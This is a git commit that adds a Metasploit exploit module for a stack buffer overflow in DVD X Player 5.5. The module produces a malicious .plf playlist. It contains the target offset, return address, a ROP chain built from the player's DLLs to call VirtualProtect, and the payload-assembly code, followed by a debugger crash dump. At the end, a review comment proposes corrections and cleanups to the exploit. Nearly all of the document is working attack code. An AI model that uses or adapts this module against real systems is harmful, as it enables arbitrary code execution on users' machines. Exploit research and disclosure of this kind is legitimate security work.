Add DVD X plf playlist buffer overflow
git-svn-id: file:///home/svn/framework3/trunk@13672 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
6de16f055a
commit
717b0eddee
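--- /dev/null
+++ b/[path not shown on page]
@@ -0,0 +1,154 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+Rank = NormalRanking #Normal/Great/Good/Poor
+
+include Msf::Exploit::FILEFORMAT
+
+def initialize(info={})
+super(update_info(info,
+'Name' => "DVD X Player 5.5 .plf PlayList Buffer Overflow",
+'Description' => %q{
+This module exploits a stack-based buffer overflow on DVD X Player 5.5 Pro and
+Standard. By supplying a long string of data in a plf file (playlist), the
+MediaPlayerCtrl.dll component will attempt to extract a filename out of the string,
+and then copy it on the stack without any proper bounds checking, which casues a
+buffer overflow, and results arbitrary code execution under the context of the user.
+
+This module has been designed to target common Windows systems such as:
+Windows XP SP2/SP3, Windows Vista, and Windows 7.
+},
+'License' => MSF_LICENSE,
+'Version' => "$Revision$",
+'Author' =>
+[
+'D3r K0n!G', #Proof-of-concept
+'sickness', #ROP
+'sinn3r', #Metasploit
+],
+'References' =>
+[
+['URL', 'http://www.exploit-db.com/exploits/17745'],
+],
+'Payload' =>
+{
+'Space' => 1000,
+'BadChars' => "\x00\x0a\x0d\x1a",
+'StackAdjustment' => -3500,
+},
+'DefaultOptions' =>
+{
+'ExitFunction' => "seh", #none/process/seh
+},
+'Platform' => 'win',
+'Targets' =>
+[
+[
+'DVD X Player 5.5 Standard / Pro',
+{
+'Offset' => 260, #To EIP
+'Ret' => 0x61626702, #POP EAX; RET [EPG.dll]
+'Max' => 2000, #Max buffer size
+}
+],
+],
+'Privileged' => false,
+'DisclosureDate' => "Aug 30 2011",
+'DefaultTarget' => 0))
+
+register_options(
+[
+OptString.new('FILENAME', [false, 'The file name', 'msf.plf'])
+], self.class)
+end
+
+def exploit
+rop = [
+0x10011108, #VirtualProtect IAT [SkinScrollBar.dll]
+0x616306ed, #MOV EAX, DWORD PTR DS:[EAX]; RET [EPG.dll]
+0x616385d8, #XCHG EAX,ESI; RETN 0 [EPG.dll]
+0x6162d202, #POP EBP; RET [EPG.dll]
+0x6160cac8, #PUSH ESP [EGP.dll]
+0x61626702, #POP EAX; RET [EGP.dll]
+0xfffffaff, #Value to negate, will become 0x00000501
+0x61627d9c, #NEG EAX; RET [epg.dll]
+0x61640124, #XCHG EAX,EBX; RET [EPG.dll]
+0x61626702, #POP EAX; RET [EPG.dll]
+0xffffffc0, #Value to negate, will become 0x00000040
+0x61627d9c, #NEG EAX; RET [EPG.dll]
+0x61608ba2, #XCHG EAX,EDX; RET [EPG.dll]
+0x6160b804, #POP ECX; RET [EPG.dll]
+0x6164b001, #Writable location [EPG.dll]
+0x6162e587, #POP EDI; RET [EPG.dll]
+0x6163081d, #ROP NOP [EPG.dll]
+0x61626702, #POP EAX; RET [EPG.dll]
+0x90909090,
+0x61620831, #PUSHAD; RET [EPG.dll]
+].pack('V*')
+
+buf = ''
+buf << rand_text_alpha(target['Offset'])
+buf << [target.ret].pack('V')
+buf << rand_text_alpha(16)
+buf << rop
+buf << make_nops(15)
+buf << payload.encoded
+buf << rand_text_alpha(target['Max']-buf.length)
+
+print_status("Creating #{datastore['FILENAME']}...")
+file_create(buf)
+end
+end
+
+=begin
+6400cd42 ffd3 call ebx {SHLWAPI!PathFindFileNameA (77f6c19c)}
+0:000> p
+eax=0406a15c ebx=77f6c19c ecx=00001300 edx=040600d0 esi=00000001 edi=6405362c
+eip=6400cd44 esp=0012f488 ebp=00eafce0 iopl=0 nv up ei pl zr na pe nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
+MediaPlayerCtrl+0xcd44:
+6400cd44 8b8dec000000 mov ecx,dword ptr <Unloaded_ionInfo.dll>+0xeb (000000ec)[ebp] ss:0023:00eafdcc=040600d0
+0:000> dd eax
+0406a15c 41414141 41414141 41414141 41414141
+0406a16c 41414141 41414141 41414141 41414141
+0406a17c 41414141 41414141 41414141 41414141
+0406a18c 41414141 41414141 41414141 41414141
+0406a19c 41414141 41414141 41414141 41414141
+0406a1ac 41414141 41414141 41414141 41414141
+0406a1bc 41414141 41414141 41414141 41414141
+0406a1cc 41414141 41414141 41414141 41414141
+0:000> g
+Breakpoint 2 hit
+eax=0406a15c ebx=77f6c19c ecx=040600d0 edx=040600d0 esi=00000001 edi=6405362c
+eip=6400cd4e esp=0012f47c ebp=00eafce0 iopl=0 nv up ei pl zr na pe nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
+MediaPlayerCtrl+0xcd4e:
+6400cd4e ff17 call dword ptr [edi] ds:0023:6405362c=6400d890
+0:000> g
+(464.c0c): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=00001389 ebx=040600d0 ecx=00000177 edx=0406a15c esi=0406af08 edi=00130000
+eip=6400dd50 esp=0012f234 ebp=00000001 iopl=0 nv up ei pl nz ac pe nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216
+MediaPlayerCtrl!DllCreateObject+0x220:
+6400dd50 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
+0:000> !address 6400dd50
+64000000 : 64001000 - 0004e000
+Type 01000000 MEM_IMAGE
+Protect 00000020 PAGE_EXECUTE_READ
+State 00001000 MEM_COMMIT
+Usage RegionUsageImage
+FullPath C:\Program Files\Aviosoft\DVD X Player 5.5 Standard\MediaPlayerCtrl.dll
+=end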
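Review bot: The module description under `'Description' => %q{` has two wording errors on the lines `which casues a` / `buffer overflow, and results arbitrary code execution`; they should read `which causes a buffer overflow, and results in arbitrary code execution under the context of the user.` The gadget comments in the `rop` array of `exploit` name the same library three ways — `[EPG.dll]` on most entries, `[EGP.dll]` on the `PUSH ESP` entry and the first `POP EAX; RET` entry, and `[epg.dll]` on the first `NEG EAX; RET` — and since the `POP EAX; RET` address `0x61626702` is tagged `[EPG.dll]` everywhere else (including the target's `Ret`), `EGP` reads as a typo; normalising every tag to `[EPG.dll]` keeps the provenance of each address unambiguous for anyone auditing the module. The closing `buf << rand_text_alpha(target['Max']-buf.length)` has no guard for an assembled buffer that already exceeds `Max`; with `Space` fixed at 1000 the values shown cannot reach it, but a comment such as `# Offset + ret + 16 + rop + nops + Space must stay below target['Max']` would record that assumption beside the subtraction. The `=begin`/`=end` debugger transcript at the end of the file would also benefit from a one-line lead-in stating what it documents (the crash site reached in MediaPlayerCtrl.dll), since it is otherwise an unannotated register dump.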